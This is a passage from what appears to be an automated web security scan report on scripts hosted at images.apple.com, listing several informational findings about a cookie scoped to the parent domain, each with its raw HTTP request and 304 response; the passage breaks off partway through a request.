s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "d7a-4323205913a80"
If-Modified-Since: Wed, 06 Jun 2007 00:38:50 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Jun 2007 00:38:50 GMT
ETag: "d7a-4323205913a80"
Cache-Control: max-age=490
Expires: Thu, 21 Jul 2011 20:39:55 GMT
Date: Thu, 21 Jul 2011 20:31:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=EHAJMB4i5huvSr6bz+eU3pbNX0WmPYP0P+xUTLO2fDw/GlbtYuBHd5jVtRJsn1sMWECvnQ5RRX5q2HikAzmSoKU62TBznh6EjT8LspazqOHvr4AyVuD83EW7Pk0d+lgl409m5IoPbbGL1jwZnoDYm8U1D5WDL2vkedEyYJ0TbabcPjnrFhVyGDx0U58YxX0hySW9B5m0eSCx1x1qQ3KiU1D6Dzhkj39DkLHx5wDZXUJxbkCfjH5/fs5+YK94VhZCWD9CzKTvts9LXR2G9Voe64DY08yM7mm+hodw6B5bkqqpZHPtzv4c3tttImDC6AAGcL2MoXWtCrmdCwQsDVPOj6htB0QvjxmoqAlbM6gZORjPdM/rzJD+2UrMupyGOVepQro7EfPzcHYzm8o88Y5E91m+qO99fn5/G2RO/d9dvHGDUNx66X9sw5etgEyJzA9QEVkPhSini6gnahASZ76iV4oHaf6UDullU+0Oz0THZn/ch13d5uBai/FYRh2gOR4BhTTQqA1F1f/aukQCA/dvJkHOqwF6GwsKRIRcEc30I8zAc8B6an0Bd6fZe+EQE2kq; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.112. http://images.apple.com/support/scripts/new_support_coverage/en_strings.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/new_support_coverage/en_strings.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=hqMS67aZcBwzSNxAuY5Hk0XYDWPNJ00Y4pYVDDsH4lGDsWRRsLbnRdYW9ABwr+8VSIOa+TmOlSiu5BmKeYj+ihhliNdYwV62iLZ43KjAOyGkW4QuiTCOJdwKw4uFaPr4ca04EQ1Nh6+067IBn8lq6rja/lbosQrHOWtbQucJk15N4P04ojYWvMKlrswnNLkHu3JZ54f+YRC+sgKL3eqqLLh32Bapxe3c/vtaQBiKhnmlKyNtxXSIUffwql16ejUKRsWrYZ+eSJXDa21DsJubvUcuHqCVAMHjyEu6TQyPzQZ+HA9gL7M5N4NKFv9H0zUA/Rg6pl/eqY9bSA5ZasAwt6MuGJywDiB99Nfs5AVwsypm16LFE2WLgKR8bg9Xc1am8orBORfg5zPzUHzVhIhNfKepuioz+Vcm65x+MLfCMasoopzqs+egTdBSWLQWNm2uGLZGcZnBuSudiF4BqxO+ZNQ6dNXyI48RCK8GfSPkxZXhwXFPnjVTHgLqoyfS4RnmryVjFB/6r9Ouue7nTZRNEW3y79MhwsfcCa/0xpnqbgYEGz5RTySCAPHm5HS/rONF; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/new_support_coverage/en_strings.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "1609-43b9e2e9179c0"
If-Modified-Since: Wed, 03 Oct 2007 22:27:59 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Wed, 03 Oct 2007 22:27:59 GMT
ETag: "1609-43b9e2e9179c0"
Cache-Control: max-age=319
Expires: Thu, 21 Jul 2011 20:37:04 GMT
Date: Thu, 21 Jul 2011 20:31:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=hqMS67aZcBwzSNxAuY5Hk0XYDWPNJ00Y4pYVDDsH4lGDsWRRsLbnRdYW9ABwr+8VSIOa+TmOlSiu5BmKeYj+ihhliNdYwV62iLZ43KjAOyGkW4QuiTCOJdwKw4uFaPr4ca04EQ1Nh6+067IBn8lq6rja/lbosQrHOWtbQucJk15N4P04ojYWvMKlrswnNLkHu3JZ54f+YRC+sgKL3eqqLLh32Bapxe3c/vtaQBiKhnmlKyNtxXSIUffwql16ejUKRsWrYZ+eSJXDa21DsJubvUcuHqCVAMHjyEu6TQyPzQZ+HA9gL7M5N4NKFv9H0zUA/Rg6pl/eqY9bSA5ZasAwt6MuGJywDiB99Nfs5AVwsypm16LFE2WLgKR8bg9Xc1am8orBORfg5zPzUHzVhIhNfKepuioz+Vcm65x+MLfCMasoopzqs+egTdBSWLQWNm2uGLZGcZnBuSudiF4BqxO+ZNQ6dNXyI48RCK8GfSPkxZXhwXFPnjVTHgLqoyfS4RnmryVjFB/6r9Ouue7nTZRNEW3y79MhwsfcCa/0xpnqbgYEGz5RTySCAPHm5HS/rONF; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.113. http://images.apple.com/support/scripts/new_support_coverage/functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/new_support_coverage/functions.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=twgRe15waKQ+fWjMqczRsDWiVy2IVDyOYQS6FbRX/WA9uZ0cD5tNYIegQBFAe2dh5eCIZ8GE6cwJrO8C4J//cdD+/3RPipwrctTA90CbR5xoDwK6I0FYxdGP0DCDMaRLmpP+wObMUKLRX5MkVlZU7PzTcO0U5nQoegWDUwi6mwJtNg9yZMKk24osEMss2gmeM29HgTzWiOD1mg3kKbCqamqbWF5yqIQTFy1PHkGaLKuKMmxoCe+jZnzqX2KSjUVTHSJKGEiZs0HDLVlHvxRilspoPaQc7SO7Visbjd5NoZS0v9IqQY2pbG2l4UL1ioP34S+Kw4S1RY/2BfQOjC8FqMrPsNTiQrd1w24cv9xUxCHTBpUZiAkoMBQSGV0QpDwe7xsNogQvsgV6R1FxcOhn2XCa5jJGCpdXEzg5vPMgYVYkEwYT1IUNh7PniPDbNlpFnabXjM8ouNRYrfihzezhMF4//ixtVwosbWIsi9jXBgPuxjo1JtpPWYvf60XaMDQaGMKSezz/2tO5oPgbyctjYbtaby7+Z3+LoQjIQu4BmVP3lk9FLPzFlkR+NbhwUBCC; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/new_support_coverage/functions.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "37fe-43d1c48c39b00"
If-Modified-Since: Mon, 22 Oct 2007 22:19:56 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Oct 2007 22:19:56 GMT
ETag: "37fe-43d1c48c39b00"
Cache-Control: max-age=497
Expires: Thu, 21 Jul 2011 20:40:02 GMT
Date: Thu, 21 Jul 2011 20:31:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=twgRe15waKQ+fWjMqczRsDWiVy2IVDyOYQS6FbRX/WA9uZ0cD5tNYIegQBFAe2dh5eCIZ8GE6cwJrO8C4J//cdD+/3RPipwrctTA90CbR5xoDwK6I0FYxdGP0DCDMaRLmpP+wObMUKLRX5MkVlZU7PzTcO0U5nQoegWDUwi6mwJtNg9yZMKk24osEMss2gmeM29HgTzWiOD1mg3kKbCqamqbWF5yqIQTFy1PHkGaLKuKMmxoCe+jZnzqX2KSjUVTHSJKGEiZs0HDLVlHvxRilspoPaQc7SO7Visbjd5NoZS0v9IqQY2pbG2l4UL1ioP34S+Kw4S1RY/2BfQOjC8FqMrPsNTiQrd1w24cv9xUxCHTBpUZiAkoMBQSGV0QpDwe7xsNogQvsgV6R1FxcOhn2XCa5jJGCpdXEzg5vPMgYVYkEwYT1IUNh7PniPDbNlpFnabXjM8ouNRYrfihzezhMF4//ixtVwosbWIsi9jXBgPuxjo1JtpPWYvf60XaMDQaGMKSezz/2tO5oPgbyctjYbtaby7+Z3+LoQjIQu4BmVP3lk9FLPzFlkR+NbhwUBCC; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.114. http://images.apple.com/support/scripts/psp_geos.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/psp_geos.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=Ood0UmYua7m+Bnf0Af5wUN/2a2kCEfR/1QN0it/sqGfB1br7sznssGFbJCD3hTynijYF+mHyFDZ8YnlUxxzu4E1U3KBRpVS8oBxjvGZAqKXZrsEDGQvfIBBw2l+mlkpqJsobbQOO3IJ3drYpoEZ5S/Y5m35u9vChxr3XGbnppaXDssy5OxFPwHbC5Q//bnzDah/Nf6QvK6F3Ho9ix4xbIEsV1O2gBhTQLE3AXMS8gRvrM9PE7A9DrmseyVpD9laz9ZA4X0+PecoVwsTWxmZRriOe7otssCZ13c72ZXJMgewJCvntdwb616lJ6319h1RIYLGblNHrUCCscW2Eb3Ifx8INhPjq8iH3g6p1ph08cAFHWUTi/DlXvKQSNAqqEVcnk7ZexorVoocj0vt4gynnPoD9/jR69ipNIUgHicV5jnEM1EP4NAJyLgWJIdaBhc4B+HbDWFB8FGNciwomYzKUmy5opghIS4ScR8DPVjt9Vw8OKfv8uG2w7qpPmYHq3Vhy862Ru6p6zqD+d+MzwEwGuZioDXVFzTvEzyslWJLJljAc0Y9+CoyT2624rSW5V6vK; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/psp_geos.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "1029-4323205913a80"
If-Modified-Since: Wed, 06 Jun 2007 00:38:50 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Jun 2007 00:38:50 GMT
ETag: "1029-4323205913a80"
Cache-Control: max-age=332
Expires: Thu, 21 Jul 2011 20:37:17 GMT
Date: Thu, 21 Jul 2011 20:31:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=Ood0UmYua7m+Bnf0Af5wUN/2a2kCEfR/1QN0it/sqGfB1br7sznssGFbJCD3hTynijYF+mHyFDZ8YnlUxxzu4E1U3KBRpVS8oBxjvGZAqKXZrsEDGQvfIBBw2l+mlkpqJsobbQOO3IJ3drYpoEZ5S/Y5m35u9vChxr3XGbnppaXDssy5OxFPwHbC5Q//bnzDah/Nf6QvK6F3Ho9ix4xbIEsV1O2gBhTQLE3AXMS8gRvrM9PE7A9DrmseyVpD9laz9ZA4X0+PecoVwsTWxmZRriOe7otssCZ13c72ZXJMgewJCvntdwb616lJ6319h1RIYLGblNHrUCCscW2Eb3Ifx8INhPjq8iH3g6p1ph08cAFHWUTi/DlXvKQSNAqqEVcnk7ZexorVoocj0vt4gynnPoD9/jR69ipNIUgHicV5jnEM1EP4NAJyLgWJIdaBhc4B+HbDWFB8FGNciwomYzKUmy5opghIS4ScR8DPVjt9Vw8OKfv8uG2w7qpPmYHq3Vhy862Ru6p6zqD+d+MzwEwGuZioDXVFzTvEzyslWJLJljAc0Y9+CoyT2624rSW5V6vK; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.115. http://images.apple.com/support/scripts/support.global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/support.global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=yTgR11uB+DBpVqfda/savR0QA9Ccb9tkGvOjAD1XXFLKNBkd/MS9W/NuQVHUBjvvgbR2X6oYongQtfm/Tgt9hD340c+/bDdyWNZI1twFEJ77mw64fa97rH94ZneaMG7ZxD4la+hTfowIo2At49rw0Q9VGG+lnyL3Fza6PCq6HhW1JjaHBAShpLJfRWXSkITCZnX/i9PbPxO88UrgR6XP6DDJyIac2rpqRthHoDt6LcfotY8iNhw5ne93S9R8FWp9ObZgerZvZxeIvSAgciZBsFpfs06OCKOT6+IDai69EmemWKD1IAxSgstgxBJJMDgxFICLmuBjuFdV0gIjBjtFx1pooD0IEj6QEIVvWXvdjt4lTpJeURGELOIlXQgUetagQOgdi2bSvDsi7gQPk2jUi5lNC8gsZjnay7gPB7U+9JtfnOlqoUwamqYLI7rDcGfEFWi3jtEVnLqf/ehMYGp4Y265KAsUbmTOv6Oq9+iVn1IC/iNC0zMAUEmJyACIatnEV9o6pjBCx91VHR9SZOzkb6PPc7sByfqCZvnkJE3TtbJFxpLZo8EWrMjmq6m+YyL5; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/support.global.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "d56-4a7fca115cbc0"
If-Modified-Since: Thu, 14 Jul 2011 00:29:43 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 00:29:43 GMT
ETag: "d56-4a7fca115cbc0"
Cache-Control: max-age=444
Expires: Thu, 21 Jul 2011 20:39:11 GMT
Date: Thu, 21 Jul 2011 20:31:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=yTgR11uB+DBpVqfda/savR0QA9Ccb9tkGvOjAD1XXFLKNBkd/MS9W/NuQVHUBjvvgbR2X6oYongQtfm/Tgt9hD340c+/bDdyWNZI1twFEJ77mw64fa97rH94ZneaMG7ZxD4la+hTfowIo2At49rw0Q9VGG+lnyL3Fza6PCq6HhW1JjaHBAShpLJfRWXSkITCZnX/i9PbPxO88UrgR6XP6DDJyIac2rpqRthHoDt6LcfotY8iNhw5ne93S9R8FWp9ObZgerZvZxeIvSAgciZBsFpfs06OCKOT6+IDai69EmemWKD1IAxSgstgxBJJMDgxFICLmuBjuFdV0gIjBjtFx1pooD0IEj6QEIVvWXvdjt4lTpJeURGELOIlXQgUetagQOgdi2bSvDsi7gQPk2jUi5lNC8gsZjnay7gPB7U+9JtfnOlqoUwamqYLI7rDcGfEFWi3jtEVnLqf/ehMYGp4Y265KAsUbmTOv6Oq9+iVn1IC/iNC0zMAUEmJyACIatnEV9o6pjBCx91VHR9SZOzkb6PPc7sByfqCZvnkJE3TtbJFxpLZo8EWrMjmq6m+YyL5; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.116. http://images.apple.com/support/scripts/warranty_check/warrantykeys.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/warranty_check/warrantykeys.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=D2HEMlmlIvkvS2UQ595HdAZKNKAOTm19V1a4UqDpQKGf0BPXJKDHgQr4zLDURpL4BCjVosrDHcuv9MzXiKC1lgBC/1/f9EkaRc6XQf44NkG1dnzmNzwFKbHERsu7Io10ur07/6AHUo2Rvqk1qlcLyONyTRmvK5HZXi3S72TwMAXtI1NxNyXlgAZE6tgRSBrCkI/v38sAe46CVPnt7Z0jo4KFPmre5c9NqrUndmuv75ofaw7I8ZI/ZGbEg0JdozbAJOkGiZeqYn212jm1A9kCazKuIPid9gH45pWqGPICJ2jQl1fEIMpohN7N4hWd2tVD1WtErrg/+4ez9ycMZY2GfPCljzF+RRpgeISdiInAOUEeN7Y00hPNdDb+hQVxIkh9/7O+goMBd8Zf2/98efwRcljsuwxAwtWYlMF8jZg2TtGwnkmNotyseLIMyDqYWy4itmIK3k2ResHbmjvFM3kGI84pqxfPFpsP0JOjQd3hj1skZqK5HKdeqrI+RBZ85uMr+Lg6bJPwCN5gH9N40dZGCZOwfID0LQjue4uodZAgePzKDM8ovQa8f1mI3isFLBB/; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/warranty_check/warrantykeys.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "10ca9-4a7d07d6a5780"
If-Modified-Since: Mon, 11 Jul 2011 19:50:06 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Mon, 11 Jul 2011 19:50:06 GMT
ETag: "10ca9-4a7d07d6a5780"
Cache-Control: max-age=451
Expires: Thu, 21 Jul 2011 20:39:17 GMT
Date: Thu, 21 Jul 2011 20:31:46 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=D2HEMlmlIvkvS2UQ595HdAZKNKAOTm19V1a4UqDpQKGf0BPXJKDHgQr4zLDURpL4BCjVosrDHcuv9MzXiKC1lgBC/1/f9EkaRc6XQf44NkG1dnzmNzwFKbHERsu7Io10ur07/6AHUo2Rvqk1qlcLyONyTRmvK5HZXi3S72TwMAXtI1NxNyXlgAZE6tgRSBrCkI/v38sAe46CVPnt7Z0jo4KFPmre5c9NqrUndmuv75ofaw7I8ZI/ZGbEg0JdozbAJOkGiZeqYn212jm1A9kCazKuIPid9gH45pWqGPICJ2jQl1fEIMpohN7N4hWd2tVD1WtErrg/+4ez9ycMZY2GfPCljzF+RRpgeISdiInAOUEeN7Y00hPNdDb+hQVxIkh9/7O+goMBd8Zf2/98efwRcljsuwxAwtWYlMF8jZg2TtGwnkmNotyseLIMyDqYWy4itmIK3k2ResHbmjvFM3kGI84pqxfPFpsP0JOjQd3hj1skZqK5HKdeqrI+RBZ85uMr+Lg6bJPwCN5gH9N40dZGCZOwfID0LQjue4uodZAgePzKDM8ovQa8f1mI3isFLBB/; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.117. http://images.apple.com/support/scripts/warranty_check/warrantypsp.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/warranty_check/warrantypsp.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=hrJbDtK5cMIRno7qhpE27Uu8DdtJxsnjXm6qSTj0aeUpzjcd0I4+2FnuAC3d+JIEEwDOyuElw0Tb3opnq6s7DreK1BQw3AkzbmR8Qg1QmuzQ+QGrSnxCuBNqLHd9fu2NoeREB7TbnSGOVdqon/CLrNTjM+IAa3ydfX1+u1UELIu/NrbOb4kBQSWI1fNACLohTJm0Z7bBQ6YAzBJraqCdSpYRTpT61itcBJu8hXz3PQ3pYJZUmCrCM/LKy6LXuhYZOMIiwqmhZALswFrWZ6in2+R4iyLQui/A/TwDpkQDKUrzGuYQOKbdyqHjNJDO8SmpFUYuLLYENWumc7z7gYTMv+4wmAUPyNoirTmMfGyQqcQB9iu7hswCR/G358qFt+YUobsbBDGAPnNSRVVVpwhhJmDbpEYN+sfAazLu5XruZal0/bythYQNNxboD4BMBrT0b0UMChIdnid3tqMFew05CAF/LWhV+tYtBLjZitV0tXsWQR5e+FQR9Rwnyebu439gCtwjTW/bflMCQ82OTi6cAPfztz1Z3nFoUEF0Ym3Ng/QJGy/omhL5iK/vMBuGapsQ; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/warranty_check/warrantypsp.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
